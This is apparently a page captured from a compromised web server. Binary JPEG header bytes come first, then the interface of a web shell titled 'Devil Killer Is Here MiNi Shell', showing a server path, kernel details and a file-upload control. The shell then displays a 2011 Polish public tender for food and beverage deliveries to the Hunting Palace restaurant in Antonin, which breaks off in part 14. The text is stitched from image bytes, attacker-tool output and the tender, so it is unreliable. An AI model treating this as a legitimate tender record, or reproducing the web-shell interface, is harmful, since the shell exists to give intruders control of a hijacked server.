JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110408/71486-N-2011.html

<p class="kh_header"><b>Kalisz: Sukcesywne dostawy produktów spożywczych do restauracji Pałacu Myśliwskiego w Antoninie.</b><br>
<b>Numer ogłoszenia: 71486 - 2011; data zamieszczenia: 08.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kultury i Sztuki , ul. Łazienna 6, 62-800 Kalisz, woj. wielkopolskie, tel. 062 7652509, faks 062 7672318.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ckis.kalisz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy produktów spożywczych do restauracji Pałacu Myśliwskiego w Antoninie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy produktów spożywczych do restauracji Pałacu Myśliwskiego w Antoninie zgodnie z wykazem i szczegółowym opisem stanowiącym załączniki ( formularze cenowe - pakiety od I do XVIII) do formularza ofertowego.
Realizacja przedmiotu zamówienia odbywać się będzie sukcesywnie w miarę bieżących potrzeb z zachowaniem terminu 1 dzień od daty jednostkowych zamówień składanych każdorazowo w formie telefonicznej, faksem, lub bezpośrednio przez upoważnionego przedstawiciela Zamawiającego  do wybranego Wykonawcy. Zamówione dostawy realizowane będą bezpośrednio do Pałacu Myśliwskiego w Antoninie transportem dostawcy i na koszt dostawcy. Dostawy będą realizowane transportem dostawcy odpowiednim do przewożenia artykułów żywnościowych i w odpowiednich opakowaniach.
Przedstawione w formularzu ofertowym ilości stanowią szacunkowy poziom zamówienia i mogą ulec zmniejszeniu nie więcej jednak niż o 30% w stosunku do ilości wskazanych w formularzu cenowym.
Przedstawione ceny w formularzu ofertowym wybranego Wykonawcy będą stałe i obowiązujące przez okres trwania umowy.
Przedstawiony w formularzu asortyment z użyciem nazw produktów jest przykładowy. Zgodnie z art. 29 i 30 ustawy Prawo Zamówień Publicznych ze względu na specyfikę zamówienia Zamawiający dopuszcza oferowanie artykułów o cechach porównywalnych, równoważnych do przedstawionych. Przedstawione w formularzu znaki, nazwy i marki są przykładowe. Wykonawca zapewni zgodność dostaw z wszystkimi wymaganiami prawnymi odnoszącymi się do bezpieczeństwa i jakości żywności objętej niniejszym zamówieniem.
Wybrany Wykonawca zobowiązany będzie do dostarczenia każdej zamawianej ilości produktów w terminie 1 dnia od daty złożenia jednostkowego zamówienia, na swój koszt do restauracji Pałacu Myśliwskiego w Antoninie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.21.00-7, 15.11.00.00-2, 15.13.11.30-5, 15.11.93.00-8, 15.20.00.00-0, 15.33.10.00-7, 15.50.00.00-3, 15.55.51.00-4, 15.81.22.00-5, 15.80.00.00-6, 15.81.00.00-9, 15.86.00.00-4, 15.90.00.00-7, 15.96.10.00-2, 15.98.00.00-1, 15.92.00.00-0, 03.22.10.00-3, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ckis.kalisz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Kultury i Sztuki w Kaliszu
 Pałac Mysliwski w Antoninie
ul. Pałacowa 1
63-421 Przygodzice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2011 godzina 10:00, miejsce: Recepcja Pałacu Myśliwskiego w Antoninie, ul. Pałacowa 1, 63-421 Przygodzice..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Drób..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy drobiu, elementówz drobiu, wątróbki drobiowej do restauracji Pałacu Myśliwskiego w Antoninie - łącznie kg. 881.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mięsa i wędliny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy mięsa wieprzowego, wołowego, cielęcego oraz wyrobow wędliniarskich do restauracji Pałacu Myśliwskiego w Antoninie - łącznie kg. 1 197.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Lody..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy lodów do restauracji Pałacu Mysliwskiego w Antoninie.
Lody gastronomiczne  5000 ml - szt.276, lody na patyku mix - szt. 300, lody rożki mix- szt. 200..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.55.51.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dziczyzna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy mięsa z dziczyzny do restauracji Pałacu Myśliwskiego w Antoninie łącznie kg. 246.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.93.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa i owoce świeże..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy waryw i owoców świeżych do restauracji Pałacu Myśliwskiego w Antoninie - łącznie kg. 4651.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ciasto..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy ciasta do restauracji Pałacu Myśliwskiego w Antoninie - torty okolicznościowe, sernik, jabłecznik,rolada makowa, torcik bezowy,biszkopt z galaretką i owocami, rolada owocowa, paj wisniowy, skubaniec, paj jabłkowy, orzechowiec, ciasto jogurtowe - łącznie kg. 793, ciastka bankietowe - szt. 560..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wódki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy napoi alkoholowych do restauracji Pałacu Mysliwskiego w Antoninie: wódki czyste i smakowe, koniaki,gin, rum, whisky, likiery,winiaki - poj. 0,5 l, 0,7 l - łacznie szt.396..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.91.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Piwo, napoje, soki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy do restauracji Pałacu Mysliwskiego w Antoninie: piwo beczkowe 30l. - keg.9, piwo 0,5 l. - szt. 1270, piwo 0,3 l. i 0,33l.- łacznie szt. 263, woda niegazowana 5l. - szt. 79, woda niegazowana 1,5l. - szt. 54, pepsi o,2 l.- szt. 336, pepsi 1l. - szt. 12, soki owocowe 0,2l. - szt. 48, sok pomidorowy 0,2 l. - szt. 200, soki iowocowe 1 l. - szt. 1017, mirinda 1l. - szt. 12, 7 up 1 l. - szt. 12, pepsi 2l. - szt.6, redbul 0,25 l. - szt. 12..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.96.10.00-2, 15.98.00.00-1, 15.92.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Napoje gazowane i niegazowane..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy napoi gazowanych i niegazowanych do restyauracji Pałacu Mysliwskiego w Antoninie: coca-cola 0,2 l. - szt. 912, fanta, sprite,kinley 0,2 l. - łacznie szt. 456, woda gazowana i niegazowana 0,25l. - łącznie szt. 2352, coca-cola, fanta, kinley 1l. - łącznie szt. 156, woda gazowana i niegazowana 1 l. - łacznier szt. 48..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Artykuły mleczarskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy produktów mleczarskich do restauracji Pałacu Mysliwskiego w Antoninie:  śmietana 30% luz- l. 206,śmietana 36% 0,5l. - szt. 560, śmietana 30% 0,25l. - szt. 238, śmietana w aerozolu- szt. 360, mleko zagęszczone0, 6 l - szt. 576, mleko uht 3,2 % 1l. - szt. 348,  mawsło śmietankowe - kg. 98, masło 15 g - szt. 3936, ser zółty I/40% - kg. 115, ser biały - kg. 10, ser feta 270 g - szt. 37, jogur owocowy 120g - szt. 1498, ser pleśniowy złocisty - kg. 4,  ser valbon, brie 120 g. - szt. 10, camembert 180 g - szt. 4, ser plastr 150 g.- szt. 51, ser zółty , weedzony, typ rolada - kg. 5, ser parmezan- szt. 10, ser naturalny 370 g. - szt. 43, ser pleśniowy perłowy, błękitny- kg. 11, sermiozzarela 100 g zółta, biała - szt. 30, seki topine mix 200 g. - szt. 20, margaryna - kg. 46, ser mascarpone 100 g. - szt. 10, śmietana 18% 250 g- szt. 20, śmietanka jednorazowa 10 g - szt. 200..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Ryby przetworzone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy ryb przetworzonych do restauracji Pałacu Myśliwskiego w Antoninie: łososś wędzony, plasty, tusza- kg 21, węgosz wędzony tusza - kg. 5, płaty śledziowe solone, matiasy - kg. 36, sum wędzony , filet- kg. 1, sum mrożony - kg 8,łosoś mroż. - kg. 45, karp mroż. patroszony - kg. 70, szczupak - kg. 6, tuńczykl w sosie 125 g - szt. 4, kawior czerwony 80 g - szt. 3, kawior czarny 80 g -szt. 3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Warzywa i ryby mrożone, owoce i warzywa przetworzone..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy do restauracji Pałacu Mysliwskiego w Antoninie, ryb mrożonych, owoców i warzyw przetworzonych:
marchew młoda,brokół róża, kalafior róża włoszczyzna paski, szpinak liściast, fasolka żółta, brukselka,groszek 2,5 kg - szt. 110, borowik połówki, kurka 2,5 kg- szt. 28, szparagi białe, zielone-kg. 27, truskawka, jagoda 2,5 kg - szt. 115,  kukurydza 2,5 kg - szt. 2, zapekanki cebulow kg. 15, półksiężyce 2,5kg, frytki proste 2,5 kg , rozetki ziemniaczane1,5 kg - szt. 5, pstrąg patyroszony z głową sola mrożona filet, morszczuk filet, dorsz filewt b/ skóry, okoń nilowy filet, - kg.  łącznie kg. 154,  frutura 221 - szt. 10, brzoskwinia 850 g - szt. 3620, ananas 580 g - szt. 336, papryka peperoni,papryka ćwiartki - szt. 43, szparagi  370 g - szt. 3, koncentrat pomidorowy 240 g - szt. 60, koncentrat 0,9 l - szt. 2, kapary 720 g - szt. 7, galaretki owocowe 1 kg -  szt.26, fasola konserwowa czerwona 426g - szt. 12, oliwki 900 g  czarne, zielone - szt. 14, ogórki konserwowe 1,7 kg - szt. 94, śliwka kalifornijska, rodzynki, morele suszone 1000 g - szt. 22,pieprz zielony w zalewie 115 g szt. 2, kukurydza mni kolby 425 ml - szt. 20, sos cytrynowo-maslany 750 g - szt. 3, wisnie drylowane 2,5 kg. -szt. 10..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Różne artykuły spożywcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywana dostawa rożnych produktow spożywczych do restauracjio Pałacu Myśliwskiego w Antoninie: keczup 3000g, 1 kg - Łącznie szt. 10, musztarda 0,9 kg, 0,2 kg - szt. 18, majonez 3 l. - szt. 30, kawa mielona 0,5 kg - szt. 26, kawa rozpuszczalna 200 g- szt. 47, herbata lipton 100 szt. - szt.7, vegeta,kucharek 1 kg - szt. 12, żelatyna 1 kg - szt. 7,  pieprz biały, czarny 0,5 kg. - szt. 11, przyprawa maggi 1 l. - szt.8, kwasek cytrynowy 0,5 kg, - szt. 4, flaki wołowe 0,9 kg - szt. 96, oregano, bazylia, zioła prowansalskie, tymianek, jałowiec 200 g - szt.3, ziele angielskie łącznie szt. 9, liść laurowy 250 g- szt. 2, rurki waflowe 1kg, serduszka waflowe -łącznie szt. 19,  curry 0,5 kg, wafle do lodów 100 szt. - op.6,  barszcz czerwony koncentrat 0,33 l - szt. 72, cukier saszetki 100 szt - op. 10,  sezam 150 g - szt. 2, papryka słodka, ostra  kg - -op. 3,5, koperek suszony,majeranek 0,5 kg - szt. 2, sosy do deserów 1 l - szt. 118, masa makowa 1 kg. - sz.1, syrop amaretto 0,5 l - szt. 3, cukier kg - kg. 220, fasola Jaś 0,5 kg - szt. 3, miód 25 g - szt.1248, miód pszczeli 380 g- szt. 75, ocet 0,5 l - szt. 83, sól 1 kg - kg. 74, makaron domowy 250 g - szt. 83, czekolada gorzka 100 g - szt. 10, słone paluszki100 g - szt. 13, makaron łazanki 0,5 kg - szt. 2 , sos pieczeniowy 1,2 kg - szt. 3 drozdze 100 g - szt. 5, primerba estragonowa, wł.oska,ogrodowa,grzybowa 330 g - szt. 7, borówka 300 g - szt. 66, pgórki kiszone - kg 4, kapusta kwawszona - kg 41, posypka cukiernicza 100 g- szt5. 12, delikat do drobiu, do mięs -szt. 19, pieprz kolorowy  0,8 kg - szt. 1, grzanki ziołowo-czosnkowe 0,7 kg - szt. 5, zupa cebulowa 0,75 kg - szt. 1, zupa brokułowa 1,3kg - szt. 1, makaron kokardki, gniadka 3 kg - łącznie 3 szt, delkat grill do mięs 0,5 kg - szt. 8, delikat grill do ryb 0,6 kg - szt. 6 przyprawa gyros - szt. 2, sos brokułowo -serowy 0,9 kg -szt. 3, pomidor suszony 28- g - szt. 12, pieprz czrny ziarnisty 200 g - szt. 2, goździki 10 g - szt. 10, sos sałatkowo ogrodowy - szt. 2, rozmaryn 200 g ,-szt. 2, czosnek granulowany 0,6 kg- szt. 4, oliwaz oliwek 1 l - szt. 11, orzech wł łuskany 0,4 -szt. 25, syrop waniliowy 0,5 kg - szt. 25, ryż długi 5 kg - szt. 2, olej 5 l - szt. 18, maka tortowa kg. 80, mąka ziemniaczana  kg. 25, kasza jęczmienna kg. 3, owoce suszone mix - kg. 2, tabasco szt. 1, makaron lazania 500 g - szt. 10, rurki czekoladowe szt. 10, babeczki kruche 900 g - szt. 10, syropy owocowe 0,5 l - szt. 5, groszek konserwowy 370 g- szt. 4,estragon 10g - szt. 2, pomidor cały cez skorki 2,55 kg - op. 6, ocet winn, balsamiczny- szt. 15, dżem 25 g - szt. 1750, dżem 270 g - szt. 14, kukurydza konserwowa 400 g- szt. 20, chrzan 180 g- szt. 6, cebula złocista 295 g - 15, pieczarki konserwowe - szt.19, żur 340 g - szt.154, pieczarka 1,7kg - szt 3, pistacje 100 g - szt.12, migdały płatki 75 g, - szt. 10, wiśnie drylowane 630 g - szt.3, grzyby suszone 40 g - szt. 44, grzubu suszone 500 g - szt. 10, żuirawina 314 ml - szt. 26, czereśnie koktajlowe 370 ml- szt. 10, wiśnie w żelu 1 kg, powidła śliwkowe 310 g, -szt. 2, mandfarynka 312 ml- sazt. 30, pieczywo czosnkow op. 4, pieprz cajene kg. 2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pieczywo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy pieczywa świeżego do restauracji Pałacu Myśliwskiego w Antoninie: chleb różne rodzaje i waga -szt. 1234, bułki małe - szt. 310, bułkatarta 0,5 kg - szt. 57, placek drożdżowy - kg. 4, chleb tostowy 400 g - szt. 37, chleb do żuru - szt. 35, ciastka kruche - kg. 27..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
